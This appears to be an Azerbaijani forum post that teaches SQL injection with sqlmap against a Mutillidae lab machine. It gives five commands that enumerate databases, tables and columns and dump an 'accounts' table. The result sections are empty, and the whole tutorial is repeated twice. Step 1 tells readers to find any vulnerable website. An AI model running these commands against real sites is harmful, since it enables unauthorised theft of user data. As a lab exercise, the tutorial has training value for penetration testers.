13rose
VIP
- İsmarıclar
- 16
- Reaksiya xalı
- 11
- Qoşuldu
- 27 Avq 2023
9 aylıq istifadəçi
Salam bugün SQLMAP istifadə edərək SQL injection edərək məlumatları necə əldə edəcəyimizi göstərəcəm
1.SQL açığı olan web saytı tapın
məs: http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details
(bu mənim virtualbox"da test məqsədli cihazımdır sizdə bu url işləməyəcək.)
KOD: sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -dbs
NƏTİCƏ:
2.Gördüyünüz kimi bir çox database var.Mövcud işlətdiyimiz database isə --current-db ilə tapacayıq
KOD:
sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" --current-db
NƏTİCƏ:
3.Burdan mövcud işlətdiyimiz database owasp10 görsənir indi bunun tabloların əldə edə -tables kodu ilə
KOD:
sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -tables -D owasp10
NƏTİCƏ:
4.İstədiymiz tablonu seçirik mən accounts seçdim.Kolumn adlarını sütun adların öyrənək əslində belədə vacib deyil dump deyib birbaşa əldə bilərik.Onuda göstərəcəm.
KOD:sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" --colum -T accounts -D owasp10
NƏTİCƏ:
5.Bu tablodakı bütün məlumatları əldə edək kod dump
KOD:sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump
NƏTİCƏ:
Gördüyünüz kimi SQLİ istifadə edərək database hacklədik.
(P.S:Bu mənim test üçün açdığım cihaz idi url sizdə işləməyəckdir.)
Faydalı oldusa bəyənin daha çoxu gəlsin sqlmap mövzusunda.
TƏŞƏKKÜRLƏR
1.SQL açığı olan web saytı tapın
məs: http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details
(bu mənim virtualbox"da test məqsədli cihazımdır sizdə bu url işləməyəcək.)
KOD: sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -dbs
NƏTİCƏ:
2.Gördüyünüz kimi bir çox database var.Mövcud işlətdiyimiz database isə --current-db ilə tapacayıq
KOD:
sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" --current-db
NƏTİCƏ:
3.Burdan mövcud işlətdiyimiz database owasp10 görsənir indi bunun tabloların əldə edə -tables kodu ilə
KOD:
sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -tables -D owasp10
NƏTİCƏ:
4.İstədiymiz tablonu seçirik mən accounts seçdim.Kolumn adlarını sütun adların öyrənək əslində belədə vacib deyil dump deyib birbaşa əldə bilərik.Onuda göstərəcəm.
KOD:sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" --colum -T accounts -D owasp10
NƏTİCƏ:
5.Bu tablodakı bütün məlumatları əldə edək kod dump
KOD:sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump
NƏTİCƏ:
Gördüyünüz kimi SQLİ istifadə edərək database hacklədik.
(P.S:Bu mənim test üçün açdığım cihaz idi url sizdə işləməyəckdir.)
Faydalı oldusa bəyənin daha çoxu gəlsin sqlmap mövzusunda.
TƏŞƏKKÜRLƏR
